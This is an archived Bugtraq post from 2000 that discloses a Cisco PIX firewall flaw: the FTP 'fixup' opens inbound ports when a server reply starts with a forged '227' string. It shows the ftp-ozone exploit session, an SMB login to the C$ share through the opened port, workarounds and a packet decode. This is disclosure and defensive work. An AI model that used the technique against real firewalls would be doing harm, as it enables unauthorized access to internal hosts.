Home page logo
/

bugtraq logo Bugtraq mailing list archives

Verified PIX vulnerability to FTP-Pasv attack.
From: monti () USHOST COM (monti)
Date: Sun, 19 Mar 2000 15:07:44 -0600


Greetings,

I sent this to Cisco about 2 weeks ago, and have received a few responses.
Apparentlly a fix is in the works, and may already have been released by
this time unbeknownst to me (although I looked for it and have not found
it yet). In any case, I thought it would be valuable to eventually post
this so that sysadmins had a little more information about how PIX is
affected along with a few possible workarounds. The problem is definitely
very serious, and there are major differences with the way the PIX is
affected than Firewall-1.

Note: This analysis relates solely to the 'server' attack, not the
'client' variation of the attack that Mikael Olsson and Dug Song have
discussed most recently. Mikael's initial posting about the Firewall-1
ftp-pasv vulnerability did prompt me to look into the PIX further though.
As has been already publicized, outbound connections from clients are also
subject to manipulation.

Please see the credits in the attached message.

Eric Monti
Denmac Systems
ericm () denmac com
monti () ushost com
847.291.7760



Summary:
--------
I confirmed and did some more research regarding the PIX hole mentioned by
Jacek Lipkowski on bugtraq entitled: 
Re: Addendum to Firewall-1 FTP Server Vulnerability

It is unknown whether Cisco has been made aware of this vulnerability, and
as such I am forwarding my findings.

I was able to verify that PIX is vulnerable to the FTP-Pasv vulnerability
that has been discussed on the Bugtraq mailing list as of late. Here are my
notes and findings. In a nutshell the PIX can be fooled into opening up
ports for inbound connections to a DMZ FTP server if the FTP server can be
fooled into sending back what looks like a valid "227 (xxx,xxx,xxx,xx,prt,prt)
response. The problem on the PIX is that the 'fixup protocol ftp' component
does not provide sufficient enough checks to verify PASV connections before
creating a dynamic hole through the firewall. Note that there are several ways
to get the FTP server to generate the message that will trigger PIX's insecure
behaviour. Please see the 'Relevant Links' section for more on this.

The exploit used for testing was Dug Song's ftp-ozone.c which was posted to
bugtraq.

The PIX tested is running the 4.4(4) version of software. Other versions have 
not been tested but are most likelly vulnerable.


Exploit notes:
--------------

Here is the session from the attacker. "ftp-ozone" is the public exploit from
Dug Song. I made a few minor 'asthetic' adjustments and added support for 
anonymous login with '-l' (although it wasnt used in this example). The source 
code is attached.

-snip-
--------------Exploit Launched-----------------
[root () ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).

Garbage packet contains:
500 
'...........................................................................................................................

Money packet contains:
227 (10,1,2,3,0,139)': command not understood


-------------Opened port connected (NBT)-------
[root () ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator 
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
  AUTOEXEC.BAT                        A       0  Mon Mar 13 03:22:58 2000
  boot.ini                          ASR     279  Mon Mar 13 03:15:07 2000
  CONFIG.SYS                          A       0  Mon Mar 13 03:22:58 2000
  IO.SYS                           AHSR       0  Mon Mar 13 03:22:58 2000
  MSDOS.SYS                        AHSR       0  Mon Mar 13 03:22:58 2000
  MSSCE                               D       0  Tue Mar  7 14:29:57 2000
  NTDETECT.COM                     AHSR   26816  Tue Mar  7 11:47:49 2000
  ntldr                            AHSR  156496  Tue Mar  7 11:47:49 2000
  pagefile.sys                        A1073741824  Tue Mar  7 11:51:51 2000
  Program Files                       D       0  Tue Mar  7 11:35:11 2000
  RECYCLER                          DHS       0  Mon Mar 13 09:35:51 2000
  TEMP                               DA       0  Tue Mar  7 14:36:31 2000
  WINNT                               D       0  Tue Mar  7 14:30:05 2000

                64706 blocks of size 65536. 43841 blocks available
smb: \> quit

-snip--

As you can see above; after the manipulated packet generated from the FTP
server by ftp-ozone is returned, we are able to connect to the NBT(tcp/139)
service and access a share. 

On the PIX with 'logging console debug' set, this was all that showed up:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21

I have attached a packet decode generated from tcpdump -w. The IP's used
are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
victim-real=192.168.205.2(doesnt appear in decode)

The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).

In Packet #11 of the decode, in the TCP data segment, you can see what is
triggering the PIX's insecure behavior: 
"227 (10,1,2,3,0,139)': command not understood."

This confirms what was assumed; that the only check that the PIX makes
before creating a dynamic PASV conduit is whether the
"227 (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the
packet.


Synopsis/Workarounds:
---------------------

Essentially this is the same as the more widely publicized
Firewall-1 incarnation of the hole (without their patch), only there are a
few major differences to note:

1. The port opened will allow bi-directional traffic (confirmed in
   PIX 4.4(4), probably others as well).
2. *ANY* port can be opened, even low-numbered and well-known ports. This
   could be worked around with a conduit ACL using explicit denies on the
   external interface.
3. The 'fixup protocol ftp' is what appears to be the core of this problem
   on the PIX side of it. If it is disabled the exploit (in any
   version) will not work. This is what handles PASV FTP on the PIX.
   If you disable it though, there are two things to note:
        Outbound ftp connections from the inside *have* be made with PASV
        ftp clients.
        Inbound ftp connections from the outside world cannot use PASV.

There may be other workarounds than those cited above. Any comments/suggestions
are welcome!

Relevant Links:
---------------

Vulnerability description/workarounds for Firewall-1 incarnation of the bug:
http://www.securityfocus.com/vdb/bottom.html?vid=979

Link to bugtraq mailing list archive discussing vulnerability and Checkpoint
workaround (please note comments about the problems with the Checkpoint patch
and some of the things to watch out for in implementing a fix):
Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro
">http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-8&thread=Pine.LNX.4.21.0002142201030.4674-100000
 () ns ldc ro
</A>

Link to Checkpoint's patch:
http://www.checkpoint.com/techsupport/alerts/pasvftp.html


Credits:
--------

I did not find this hole (initially). 
It was discovered officially and publicized by several other people.
Much thanks goes to these folks!

Jacek Lipkowski 
sq5bpf () ACID CH PW EDU PL
For originally verifying PIX's vulnerability based on Firewall-1 discussions.

Mikael Olsson 
mikael.olsson () enternet se
For original bugtraq postings, insights regarding this issue, and Firewall-1
confirmation.

Dataprotect:
John McDonald <jm () dataprotect com>
Thomas Lopatic <tl () dataprotect com>
For their verification of the vulnerability on Checkpoint Firewall-1.

Dug Song:
dugsong () monkey org
For original public exploit code.

Please see www.securityfocus.com bugtraq archive for all relevant posts.

I am copying all of the above people, and will be waiting for 10 days for a
response from Cisco regarding this hole before releasing any more information
publicly. If need be, I can wait longer if a fix is in the works, although
the existence of the bug has already been made public. I cannot control
whether this will be forwarded to other parties by the other people CC'd
so I leave that to their discretion.

Thanks,
Eric Monti
Denmac Systems
ericm () denmac com
847.291.7760


Packet 1
        Timestamp:                      15:02:37.130283
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                60 bytes
        Identification:                 0x04CF
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D4C
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818403974
        Acknowledgement Number:         0000000000
        Header Length:                  40 bytes (data=0)
        Flags:                          URG=off, ACK=off, PSH=off
                                        RST=off, SYN=on,  FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0x78CB
        Urgent Pointer:                 0
        <Options not displayed>
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 2
        Timestamp:                      15:02:37.130720
        Source Ethernet Address:        00:D0:B7:0E:18:AB
        Destination Ethernet Address:   00:50:04:28:FE:EB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                44 bytes
        Identification:                 0x4311
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            128
        Encapsulated Protocol:          TCP
        Header Checksum:                0x9F19
        Source IP Address:              10.1.2.3
        Destination IP Address:         10.1.2.4
TCP Header
        Source Port:                    21 (ftp)
        Destination Port:               1139 (<unknown>)
        Sequence Number:                1212576390
        Acknowledgement Number:         1818403975
        Header Length:                  24 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=on,  FIN=off
        Window Advertisement:           8760 bytes
        Checksum:                       0x8CFE
        Urgent Pointer:                 0
        <Options not displayed>
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 3
        Timestamp:                      15:02:37.130765
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                40 bytes
        Identification:                 0x04D0
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D5F
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818403975
        Acknowledgement Number:         1212576391
        Header Length:                  20 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0xC673
        Urgent Pointer:                 0
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 4
        Timestamp:                      15:02:37.131178
        Source Ethernet Address:        00:D0:B7:0E:18:AB
        Destination Ethernet Address:   00:50:04:28:FE:EB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                88 bytes
        Identification:                 0x4411
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            128
        Encapsulated Protocol:          TCP
        Header Checksum:                0x9DED
        Source IP Address:              10.1.2.3
        Destination IP Address:         10.1.2.4
TCP Header
        Source Port:                    21 (ftp)
        Destination Port:               1139 (<unknown>)
        Sequence Number:                1212576391
        Acknowledgement Number:         1818403975
        Header Length:                  20 bytes (data=48)
        Flags:                          URG=off, ACK=on,  PSH=on
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           8760 bytes
        Checksum:                       0x0458
        Urgent Pointer:                 0
TCP Data
        220 wapp2 Microsoft FTP Service (Version 4.0)..
        
-----------------------------------------------------------------
Packet 5
        Timestamp:                      15:02:37.131204
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                40 bytes
        Identification:                 0x04D1
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D5E
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818403975
        Acknowledgement Number:         1212576439
        Header Length:                  20 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           80 bytes
        Checksum:                       0xC673
        Urgent Pointer:                 0
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 6
        Timestamp:                      15:02:47.126818
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                163 bytes
        Identification:                 0x04D2
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1CE2
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818403975
        Acknowledgement Number:         1212576439
        Header Length:                  20 bytes (data=123)
        Flags:                          URG=off, ACK=on,  PSH=on
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0x96BF
        Urgent Pointer:                 0
TCP Data
        
...........................................................................................................................
-----------------------------------------------------------------
Packet 7
        Timestamp:                      15:02:47.248131
        Source Ethernet Address:        00:D0:B7:0E:18:AB
        Destination Ethernet Address:   00:50:04:28:FE:EB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                40 bytes
        Identification:                 0x4511
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            128
        Encapsulated Protocol:          TCP
        Header Checksum:                0x9D1D
        Source IP Address:              10.1.2.3
        Destination IP Address:         10.1.2.4
TCP Header
        Source Port:                    21 (ftp)
        Destination Port:               1139 (<unknown>)
        Sequence Number:                1212576439
        Acknowledgement Number:         1818404098
        Header Length:                  20 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           8637 bytes
        Checksum:                       0xA48B
        Urgent Pointer:                 0
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 8
        Timestamp:                      15:02:47.248184
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                69 bytes
        Identification:                 0x04D3
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D3F
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818404098
        Acknowledgement Number:         1212576439
        Header Length:                  20 bytes (data=29)
        Flags:                          URG=off, ACK=on,  PSH=on
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0x2602
        Urgent Pointer:                 0
TCP Data
        227 (10,1,2,3,0,139).
        
-----------------------------------------------------------------
Packet 9
        Timestamp:                      15:02:47.248558
        Source Ethernet Address:        00:D0:B7:0E:18:AB
        Destination Ethernet Address:   00:50:04:28:FE:EB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                168 bytes
        Identification:                 0x4611
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            128
        Encapsulated Protocol:          TCP
        Header Checksum:                0x9B9D
        Source IP Address:              10.1.2.3
        Destination IP Address:         10.1.2.4
TCP Header
        Source Port:                    21 (ftp)
        Destination Port:               1139 (<unknown>)
        Sequence Number:                1212576439
        Acknowledgement Number:         1818404127
        Header Length:                  20 bytes (data=128)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           8608 bytes
        Checksum:                       0x168C
        Urgent Pointer:                 0
TCP Data
        500 
'...........................................................................................................................
-----------------------------------------------------------------
Packet 10
        Timestamp:                      15:02:47.248599
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                40 bytes
        Identification:                 0x04D4
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D5B
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818404127
        Acknowledgement Number:         1212576567
        Header Length:                  20 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0xC52B
        Urgent Pointer:                 0
TCP Data
        <No data>
-----------------------------------------------------------------
Packet 11
        Timestamp:                      15:02:47.248836
        Source Ethernet Address:        00:D0:B7:0E:18:AB
        Destination Ethernet Address:   00:50:04:28:FE:EB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                94 bytes
        Identification:                 0x4711
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            128
        Encapsulated Protocol:          TCP
        Header Checksum:                0x9AE7
        Source IP Address:              10.1.2.3
        Destination IP Address:         10.1.2.4
TCP Header
        Source Port:                    21 (ftp)
        Destination Port:               1139 (<unknown>)
        Sequence Number:                1212576567
        Acknowledgement Number:         1818404127
        Header Length:                  20 bytes (data=54)
        Flags:                          URG=off, ACK=on,  PSH=on
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           8608 bytes
        Checksum:                       0x1DD1
        Urgent Pointer:                 0
TCP Data
        227 (10,1,2,3,0,139)': command not understood.
        
-----------------------------------------------------------------
Packet 12
        Timestamp:                      15:02:47.266742
        Source Ethernet Address:        00:50:04:28:FE:EB
        Destination Ethernet Address:   00:D0:B7:0E:18:AB
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                40 bytes
        Identification:                 0x04D5
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          TCP
        Header Checksum:                0x1D5A
        Source IP Address:              10.1.2.4
        Destination IP Address:         10.1.2.3
TCP Header
        Source Port:                    1139 (<unknown>)
        Destination Port:               21 (ftp)
        Sequence Number:                1818404127
        Acknowledgement Number:         1212576621
        Header Length:                  20 bytes (data=0)
        Flags:                          URG=off, ACK=on,  PSH=off
                                        RST=off, SYN=off, FIN=off
        Window Advertisement:           128 bytes
        Checksum:                       0xC4F5
        Urgent Pointer:                 0
TCP Data
        <No data>


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault